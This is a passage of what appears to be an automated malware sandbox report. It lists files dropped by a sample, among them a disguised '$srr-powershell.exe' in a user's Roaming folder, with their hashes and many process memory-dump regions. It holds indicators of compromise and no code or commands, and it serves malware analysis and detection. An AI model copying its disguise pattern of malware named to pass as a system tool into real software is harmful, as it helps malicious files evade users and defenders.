                                                                                                                        a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                        SHA512

                                                                                                                        2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                                                        Filesize

                                                                                                                        409KB

                                                                                                                        MD5

                                                                                                                        a0f5aa5764c4f66eee82f857f9f447b6

                                                                                                                        SHA1

                                                                                                                        3c3a780d020cb3eb3088223443fe813abb95dccd

                                                                                                                        SHA256

                                                                                                                        43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

                                                                                                                        SHA512

                                                                                                                        458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

                                                                                                                      • C:\Windows\Temp\__PSScriptPolicyTest_zimth51m.mf5.ps1
                                                                                                                        Filesize

                                                                                                                        60B

                                                                                                                        MD5

                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                        SHA1

                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                        SHA256

                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                        SHA512

                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                      • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                        Filesize

                                                                                                                        338B

                                                                                                                        MD5

                                                                                                                        cd7bc1b36c7721b5637c2d845b5216d1

                                                                                                                        SHA1

                                                                                                                        3221d38a03e60b083fd26c29dfefef5fbf96e111

                                                                                                                        SHA256

                                                                                                                        d256ca0bd13fd5c87a36879cece586f9507cd0d66eccae117df7f65de3169686

                                                                                                                        SHA512

                                                                                                                        4cbbd32ab7742e6c46ec5833b14ee47545863b1a40d748e143c59584f19ccdad3e0467d9dc1716c0c4b2076e80212150beb8677d5c8dfb4fe58eda2a13e46237

                                                                                                                      • memory/404-93-0x000001D631910000-0x000001D63193B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/424-89-0x00007FFDFF210000-0x00007FFDFF220000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/424-88-0x000002934C730000-0x000002934C75B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/424-82-0x000002934C730000-0x000002934C75B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/636-48-0x00000215BFAD0000-0x00000215BFAFB000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/636-55-0x00007FFDFF210000-0x00007FFDFF220000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/636-47-0x00000215BFAD0000-0x00000215BFAFB000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/636-54-0x00000215BFAD0000-0x00000215BFAFB000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/636-46-0x00000215BFAA0000-0x00000215BFAC5000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        148KB

                                                                                                                      • memory/664-30-0x0000024CB6AC0000-0x0000024CB6AEA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        168KB

                                                                                                                      • memory/664-31-0x00007FFE3F180000-0x00007FFE3F389000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.0MB

                                                                                                                      • memory/664-32-0x00007FFE3EAE0000-0x00007FFE3EB9D000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        756KB

                                                                                                                      • memory/664-29-0x0000024CB6A20000-0x0000024CB6A42000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        136KB

                                                                                                                      • memory/692-60-0x000001461C4E0000-0x000001461C50B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/692-66-0x00007FFDFF210000-0x00007FFDFF220000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/692-65-0x000001461C4E0000-0x000001461C50B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/988-77-0x00007FFDFF210000-0x00007FFDFF220000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/988-76-0x0000014816960000-0x000001481698B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/988-70-0x0000014816960000-0x000001481698B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/1180-35-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/1180-38-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/1180-43-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/1180-42-0x00007FFE3EAE0000-0x00007FFE3EB9D000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        756KB

                                                                                                                      • memory/1180-33-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/1180-34-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/1180-41-0x00007FFE3F180000-0x00007FFE3F389000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.0MB

                                                                                                                      • memory/1180-36-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/3760-14-0x0000000075150000-0x0000000075901000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/3760-711-0x0000000075150000-0x0000000075901000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/3760-79-0x0000000006AB0000-0x0000000006ABA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        40KB

                                                                                                                      • memory/3760-710-0x0000000075150000-0x0000000075901000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/3760-13-0x0000000075150000-0x0000000075901000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/5012-20-0x0000000075150000-0x0000000075901000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/5012-0-0x000000007515E000-0x000000007515F000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5012-7-0x0000000006270000-0x00000000062AC000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        240KB

                                                                                                                      • memory/5012-6-0x0000000005D40000-0x0000000005D52000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        72KB

                                                                                                                      • memory/5012-5-0x00000000050F0000-0x0000000005156000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        408KB

                                                                                                                      • memory/5012-4-0x0000000075150000-0x0000000075901000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/5012-3-0x0000000005030000-0x00000000050C2000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        584KB

                                                                                                                      • memory/5012-2-0x00000000054F0000-0x0000000005A96000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        5.6MB

                                                                                                                      • memory/5012-1-0x00000000004F0000-0x000000000055C000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        432KB